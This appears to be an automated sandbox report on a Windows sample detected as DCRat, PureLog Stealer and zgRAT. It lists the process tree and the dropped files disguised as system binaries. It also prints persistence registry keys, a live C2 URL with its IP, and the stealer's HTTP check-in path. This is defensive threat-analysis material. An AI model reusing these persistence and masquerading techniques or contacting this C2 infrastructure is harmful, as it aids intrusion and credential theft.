
Windows Analysis Report
Zn0uX5K1ez.exe

Overview

General Information

Sample name: Zn0uX5K1ez.exe (renamed because the original name is a hash value)
Original sample name: 58509394a423edb98b0b1be7f18551ab.exe
Analysis ID: 1523119
MD5: 58509394a423edb98b0b1be7f18551ab
SHA1: 4b7a8ff6ec8bd5908e306cb23d2b84ce3ff03ec3
SHA256: 78fee239cf44c2ab923669b8ccf016ef117a9682e339d96de87fa2f0a45200cc
Tags: DCRat, exe, user-abuse_ch

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Found direct / indirect Syscall (likely to bypass EDR)
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly setting hooks in a foreign process
PE file contains section with special chars
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Sigma detected: Windows Binaries Write Suspicious Extensions
Tries to detect debuggers (CloseHandle check)
Tries to evade analysis by executing a special instruction (VM detection)
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Entry point lies outside standard sections
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Conhost Spawned By Uncommon Parent Process
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Suspicious Process Start Locations
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Zn0uX5K1ez.exe (PID: 5492 cmdline: "C:\Users\user\Desktop\Zn0uX5K1ez.exe" MD5: 58509394A423EDB98B0B1BE7F18551AB)
    • svchost.exe (PID: 5072 cmdline: "C:\Users\user\AppData\Local\Temp\svchost.exe" MD5: A87CB2A1E23600C28C1A8E6A5C6A1C52)
      • wscript.exe (PID: 7124 cmdline: "C:\Windows\System32\WScript.exe" "C:\blockhostnet\dbHnJe8FTGPofdGpjq0jOMhg.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
        • cmd.exe (PID: 7008 cmdline: C:\Windows\system32\cmd.exe /c ""C:\blockhostnet\iXSXm.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • msinto.exe (PID: 6248 cmdline: "C:\blockhostnet/msinto.exe" MD5: 83152560524B250C6C27561117DF37FE)
            • csc.exe (PID: 5228 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bpgiaqs4\bpgiaqs4.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
              • conhost.exe (PID: 6416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cvtres.exe (PID: 3708 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB3CA.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC35F53CF7FFB422D917B12E88668AC1.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
            • csc.exe (PID: 2656 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tcgkwiyn\tcgkwiyn.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
              • conhost.exe (PID: 4852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cvtres.exe (PID: 2752 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB531.tmp" "c:\Windows\System32\CSCEBFD873D95F4D378C8CAFD01222E4F7.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
            • cmd.exe (PID: 400 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\klrkJh2DBx.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 5072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • chcp.com (PID: 4388 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
              • w32tm.exe (PID: 6488 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
              • conhost.exe (PID: 1924 cmdline: "C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\conhost.exe" MD5: 83152560524B250C6C27561117DF37FE)
    • explorer.exe (PID: 3460 cmdline: "C:\Users\user\AppData\Local\Temp\explorer.exe" MD5: 52AAA8C3FD6B813B713AE05AB9E4829C)
      • conhost.exe (PID: 5876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5936 cmdline: C:\Windows\system32\cmd.exe /c cls MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • lsass.exe (PID: 5972 cmdline: "C:\Recovery\lsass.exe" MD5: 83152560524B250C6C27561117DF37FE)
  • conhost.exe (PID: 2096 cmdline: "C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\conhost.exe" MD5: 83152560524B250C6C27561117DF37FE)
  • explorer.exe (PID: 7148 cmdline: "C:\Windows\debug\explorer.exe" MD5: 83152560524B250C6C27561117DF37FE)
  • msinto.exe (PID: 6244 cmdline: "C:\blockhostnet\msinto.exe" MD5: 83152560524B250C6C27561117DF37FE)
  • lsass.exe (PID: 6924 cmdline: "C:\Recovery\lsass.exe" MD5: 83152560524B250C6C27561117DF37FE)
  • conhost.exe (PID: 3212 cmdline: "C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\conhost.exe" MD5: 83152560524B250C6C27561117DF37FE)
  • explorer.exe (PID: 6076 cmdline: "C:\Windows\debug\explorer.exe" MD5: 83152560524B250C6C27561117DF37FE)
  • cleanup
Malware configuration (DCRat):
{"C2 url": "http://664930cm.n9shka.top/VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads", "MUTEX": "DCR_MUTEX-I0F3xOgXin83Nkym1lQr", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Yara matches on the submitted sample
Source | Rule | Description | Author
Zn0uX5K1ez.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
Zn0uX5K1ez.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

Yara matches on dropped files
Source | Rule | Description | Author
C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\blockhostnet\msinto.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
C:\blockhostnet\msinto.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\Windows\Globalization\Time Zone\backgroundTaskHost.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
(9 entries in total; first 5 shown)

Yara matches on memory dumps
Source | Rule | Description | Author
00000002.00000003.2104402669.0000000006800000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000015.00000002.3361148000.000000000294B000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
00000002.00000003.2103951252.0000000006000000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000015.00000002.3361148000.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
0000000A.00000002.2399954472.000000001312B000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
(7 entries in total; first 5 shown)

Yara matches on unpacked PE files
Source | Rule | Description | Author
2.3.svchost.exe.684e6bb.1.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
2.3.svchost.exe.684e6bb.1.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
2.3.svchost.exe.604e6bb.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
2.3.svchost.exe.604e6bb.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
2.3.svchost.exe.684e6bb.1.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
(19 entries in total; first 5 shown)

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: "C:\Windows\debug\explorer.exe" , CommandLine: "C:\Windows\debug\explorer.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\debug\explorer.exe, NewProcessName: C:\Windows\debug\explorer.exe, OriginalFileName: C:\Windows\debug\explorer.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\debug\explorer.exe" , ProcessId: 7148, ProcessName: explorer.exe
Source: File created; Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Users\user\Desktop\Zn0uX5K1ez.exe, ProcessId: 5492, TargetFilename: C:\Users\user\AppData\Local\Temp\svchost.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali; Data: Command: "C:\Users\user\AppData\Local\Temp\svchost.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Zn0uX5K1ez.exe", ParentImage: C:\Users\user\Desktop\Zn0uX5K1ez.exe, ParentProcessId: 5492, ParentProcessName: Zn0uX5K1ez.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe" , ProcessId: 5072, ProcessName: svchost.exe
Source: File created; Author: Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\svchost.exe, ProcessId: 5072, TargetFilename: C:\blockhostnet\dbHnJe8FTGPofdGpjq0jOMhg.vbe
Source: Process started; Author: Tim Rauch; Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\explorer.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\explorer.exe, ParentProcessId: 3460, ParentProcessName: explorer.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 5876, ProcessName: conhost.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: "C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe", EventID: 13, EventType: SetValue, Image: C:\blockhostnet\msinto.exe, ProcessId: 6248, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\hPeZTHbzcsUskSflSyozwAqUA
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: explorer.exe, "C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe", EventID: 13, EventType: SetValue, Image: C:\blockhostnet\msinto.exe, ProcessId: 6248, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
Source: Process started; Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems); Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bpgiaqs4\bpgiaqs4.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bpgiaqs4\bpgiaqs4.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\blockhostnet/msinto.exe", ParentImage: C:\blockhostnet\msinto.exe, ParentProcessId: 6248, ParentProcessName: msinto.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bpgiaqs4\bpgiaqs4.cmdline", ProcessId: 5228, ProcessName: csc.exe
Source: Process started; Author: juju4, Jonhnathan Ribeiro, oscd.community; Data: Command: "C:\Windows\debug\explorer.exe" , CommandLine: "C:\Windows\debug\explorer.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\debug\explorer.exe, NewProcessName: C:\Windows\debug\explorer.exe, OriginalFileName: C:\Windows\debug\explorer.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\debug\explorer.exe" , ProcessId: 7148, ProcessName: explorer.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\AppData\Local\Temp\svchost.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Zn0uX5K1ez.exe", ParentImage: C:\Users\user\Desktop\Zn0uX5K1ez.exe, ParentProcessId: 5492, ParentProcessName: Zn0uX5K1ez.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe" , ProcessId: 5072, ProcessName: svchost.exe
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WScript.exe" "C:\blockhostnet\dbHnJe8FTGPofdGpjq0jOMhg.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\blockhostnet\dbHnJe8FTGPofdGpjq0jOMhg.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentProcessId: 5072, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\blockhostnet\dbHnJe8FTGPofdGpjq0jOMhg.vbe" , ProcessId: 7124, ProcessName: wscript.exe
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\blockhostnet\msinto.exe, ProcessId: 6248, TargetFilename: C:\Users\user\AppData\Local\Temp\bpgiaqs4\bpgiaqs4.cmdline
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\AppData\Local\Temp\svchost.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Zn0uX5K1ez.exe", ParentImage: C:\Users\user\Desktop\Zn0uX5K1ez.exe, ParentProcessId: 5492, ParentProcessName: Zn0uX5K1ez.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe" , ProcessId: 5072, ProcessName: svchost.exe

Data Obfuscation

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bpgiaqs4\bpgiaqs4.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bpgiaqs4\bpgiaqs4.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\blockhostnet/msinto.exe", ParentImage: C:\blockhostnet\msinto.exe, ParentProcessId: 6248, ParentProcessName: msinto.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bpgiaqs4\bpgiaqs4.cmdline", ProcessId: 5228, ProcessName: csc.exe

Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-01T05:57:31.855707+0200 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.6 | 49706 | 37.44.238.250 | 80 | TCP


AV Detection

Source: Zn0uX5K1ez.exe; Avira: detected
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe; Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Windows\debug\explorer.exe; Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Recovery\lsass.exe; Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\blockhostnet\dbHnJe8FTGPofdGpjq0jOMhg.vbe; Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Users\user\AppData\Local\Temp\svchost.exe; Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Users\user\Desktop\SIVCnSke.log; Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\Desktop\crpSXvpM.log; Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Windows\Globalization\Time Zone\backgroundTaskHost.exe; Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\iGvrsCDf.log; Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\Desktop\kRRssUig.log; Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe; Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\klrkJh2DBx.bat; Avira: detection malicious, Label: BAT/Delbat.C
Source: 0000000A.00000002.2399954472.000000001312B000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: DCRat {"C2 url": "http://664930cm.n9shka.top/VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads", "MUTEX": "DCR_MUTEX-I0F3xOgXin83Nkym1lQr", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source: 664930cm.n9shka.top; Virustotal: Detection: 9%
Source: http://664930cm.n9shka.top; Virustotal: Detection: 9%
Source: http://664930cm.n9shka.top/VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php; Virustotal: Detection: 9%
Source: http://664930cm.n9shka.top/; Virustotal: Detection: 9%
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe; ReversingLabs: Detection: 75%
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe; Virustotal: Detection: 56%
Source: C:\Recovery\lsass.exe; ReversingLabs: Detection: 75%
Source: C:\Recovery\lsass.exe; Virustotal: Detection: 56%
Source: C:\Users\user\AppData\Local\Temp\explorer.exe; ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\explorer.exe; Virustotal: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\svchost.exe; ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\svchost.exe; Virustotal: Detection: 58%
Source: C:\Users\user\Desktop\AEdPygqV.log; ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\AEdPygqV.log; Virustotal: Detection: 28%
Source: C:\Users\user\Desktop\JfNMDZUx.log; Virustotal: Detection: 10%
Source: C:\Users\user\Desktop\SIVCnSke.log; Virustotal: Detection: 40%
Source: C:\Users\user\Desktop\admBIJoy.log; Virustotal: Detection: 10%
Source: C:\Users\user\Desktop\crpSXvpM.log; ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\crpSXvpM.log; Virustotal: Detection: 69%
Source: C:\Users\user\Desktop\iGvrsCDf.log; Virustotal: Detection: 40%
Source: C:\Users\user\Desktop\kRRssUig.log; ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\kRRssUig.log; Virustotal: Detection: 69%
Source: C:\Users\user\Desktop\mFVAeiee.log; ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\mFVAeiee.log; Virustotal: Detection: 28%
Source: C:\Windows\Globalization\Time Zone\backgroundTaskHost.exe; ReversingLabs: Detection: 75%
Source: C:\Windows\Globalization\Time Zone\backgroundTaskHost.exe; Virustotal: Detection: 56%
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe; ReversingLabs: Detection: 75%
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe; Virustotal: Detection: 56%
Source: C:\Windows\debug\explorer.exe; ReversingLabs: Detection: 75%
Source: C:\Windows\debug\explorer.exe; Virustotal: Detection: 56%
Source: C:\blockhostnet\msinto.exe; ReversingLabs: Detection: 75%
Source: C:\blockhostnet\msinto.exe; Virustotal: Detection: 56%
Source: Zn0uX5K1ez.exe; ReversingLabs: Detection: 71%
Source: Zn0uX5K1ez.exe; Virustotal: Detection: 73%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.6% probability
Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\explorer.exe; Joe Sandbox ML: detected
Source: C:\Windows\debug\explorer.exe; Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\admBIJoy.log; Joe Sandbox ML: detected
Source: C:\Recovery\lsass.exe; Joe Sandbox ML: detected
Source: C:\Windows\System32\SecurityHealthSystray.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\svchost.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe; Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\JfNMDZUx.log; Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\crpSXvpM.log; Joe Sandbox ML: detected
Source: C:\Windows\Globalization\Time Zone\backgroundTaskHost.exe; Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\kRRssUig.log; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe; Joe Sandbox ML: detected
Source: Zn0uX5K1ez.exe; Joe Sandbox ML: detected
Source: Zn0uX5K1ez.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Zn0uX5K1ez.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb; source: svchost.exe, 00000002.00000003.2104402669.0000000006800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000000.2102681512.0000000000863000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp, Zn0uX5K1ez.exe, svchost.exe.0.dr
Source: Binary string: :C:\Users\user\AppData\Local\Temp\bpgiaqs4\bpgiaqs4.pdb; source: msinto.exe, 0000000A.00000002.2389367064.0000000003795000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\tcgkwiyn\tcgkwiyn.pdb; source: msinto.exe, 0000000A.00000002.2389367064.0000000003795000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\User\Desktop\payload\obj\Debug\payload.pdb; source: Zn0uX5K1ez.exe

Spreading

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Source: C:\Users\user\AppData\Local\Temp\svchost.exe; Code function: 2_2_0083A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,2_2_0083A69B
Source: C:\Users\user\AppData\Local\Temp\svchost.exe; Code function: 2_2_0084C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,2_2_0084C220
Source: C:\Users\user\AppData\Local\Temp\svchost.exe; Code function: 2_2_0085B348 FindFirstFileExA,2_2_0085B348
Source: C:\blockhostnet\msinto.exe; File opened: C:\Users\user\AppData
Source: C:\blockhostnet\msinto.exe; File opened: C:\Users\user\AppData\Local
Source: C:\blockhostnet\msinto.exe; File opened: C:\Users\user
Source: C:\blockhostnet\msinto.exe; File opened: C:\Users\user\Documents\desktop.ini
Source: C:\blockhostnet\msinto.exe; File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\blockhostnet\msinto.exe; File opened: C:\Users\user\AppData\Local\Temp

Networking

Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49706 -> 37.44.238.250:80
Source: Joe Sandbox View | IP Address: 37.44.238.250
Source: Joe Sandbox View | ASN Name: HARMONYHOSTING-ASFR

Source: global traffic | HTTP traffic detected:
    POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
